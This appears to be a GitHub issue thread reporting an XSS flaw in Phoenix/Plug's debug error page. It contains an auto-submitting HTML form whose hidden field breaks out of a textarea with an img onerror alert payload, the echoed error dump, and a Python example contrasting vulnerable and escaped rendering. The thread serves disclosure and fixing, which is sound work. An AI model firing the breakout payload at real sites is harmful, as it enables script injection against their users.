Phoenix `debug_errors` vulnerable to XSS

When `debug_errors: true`, JavaScript can be executed.

<html>
  <body>
    <form id="xss" action="https://domain.com/NateMail.php" method="POST">
      <input type="hidden" name="recipient" value="hhhhhh&lt;&#47;textarea&gt;&lt;img&#47;src&#61;x&#32;onerror&#61;alert&#40;'Identied_as_CVE-2019-13392'&#41;&gt;" />
    </form>
    <script>
      document.getElementById('xss').submit();
    </script>
  </body>
</html>

Error reporting allows javascript to be executed.

<div class="code-explorer">
    <textarea class="hidden-contents" role="copy-contents"># Plug.CSRFProtection.InvalidCSRFTokenError at POST /NateMail.php

Exception:

    ** (Plug.CSRFProtection.InvalidCSRFTokenError) invalid CSRF (Cross Site Request Forgery) token, please make sure that:
    
      * The session cookie is being sent and session is loaded
      * The request include a valid '_csrf_token' param or 'x-csrf-token' header
        (plug 1.14.0) lib/plug/csrf_protection.ex:316: Plug.CSRFProtection.call/2

[etc]

## Connection details

### Params

    %{"path" => ["NateMail.php"], "recipient" => "hhhhhh</textarea><img/src=x onerror=alert('Identied_as_CVE-2019-13392')>"}

[etc]
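The pasted HTML above shows where the injection lands: the debugger's "copy contents" `<textarea>` holds a markdown dump of the request, and the `recipient` param is interpolated into it verbatim. Textarea content is RCDATA, so the only sequence that can terminate it is `</textarea`; once user input supplies that, everything after it is parsed as ordinary markup and the `<img onerror>` runs. The following is an added example (not Plug's code, and in Python rather than Elixir purely so it runs stand-alone): a vulnerable and a hardened rendering of that textarea, a check that counts early end-tag sequences in the body, and a confirmation that escaping does not change what a copy-contents script reads back. The `OPEN`/`CLOSE` strings, the `render_*` names and the sample `PARAMS` are constructed for the example; `repr()` stands in for Elixir's `inspect/1`, and the alert text is a placeholder rather than the thread's payload.

```python
import html
import re

# Constructed stand-ins for the debugger's hidden textarea markup.
OPEN = '<textarea class="hidden-contents" role="copy-contents">'
CLOSE = "</textarea>"

# Constructed sample input modelled on the params dump shown in the thread.
PARAMS = {
    "path": ["NateMail.php"],
    "recipient": "hhhhhh</textarea><img/src=x onerror=alert('xss-placeholder')>",
}


def dump_params(params):
    """Text dump of the params; repr() plays the role of Elixir's inspect/1."""
    return repr(params)


def render_vulnerable(params):
    """Interpolates the raw dump into the textarea: user input can close the element."""
    return OPEN + dump_params(params) + CLOSE


def render_hardened(params):
    """HTML-escapes the dump first, so '<' becomes '&lt;' and '</textarea' can never
    appear literally inside the body."""
    return OPEN + html.escape(dump_params(params), quote=True) + CLOSE


# RCDATA is terminated by a case-insensitive '</textarea' sequence.
_BREAKOUT = re.compile(r"</textarea", re.IGNORECASE)


def breakout_count(rendered):
    """Number of end-tag sequences inside the textarea body. Any value above zero
    means user-controlled text ended the element early and the remainder of the
    input is parsed as markup."""
    body = rendered[len(OPEN):-len(CLOSE)]
    return len(_BREAKOUT.findall(body))


def decoded_body(rendered):
    """What a copy-contents script reading textarea.value would observe: the browser
    decodes entities in RCDATA, so escaping loses no information."""
    return html.unescape(rendered[len(OPEN):-len(CLOSE)])


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        out = render(PARAMS)
        print(f"{name}: breakouts={breakout_count(out)} img_present={'<img' in out}")
```

The `decoded_body` check is the part worth keeping in a test suite: it demonstrates that escaping the dump costs nothing for the copy feature, which removes the usual argument for leaving debug-only pages unescaped.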

Could you please open up an issue or submit a PR? That would be part of elixir-plug/plug on GitHub ("Compose web applications with functions"). This is a dev only mode but it would be good to get it addressed anyway. Thank you.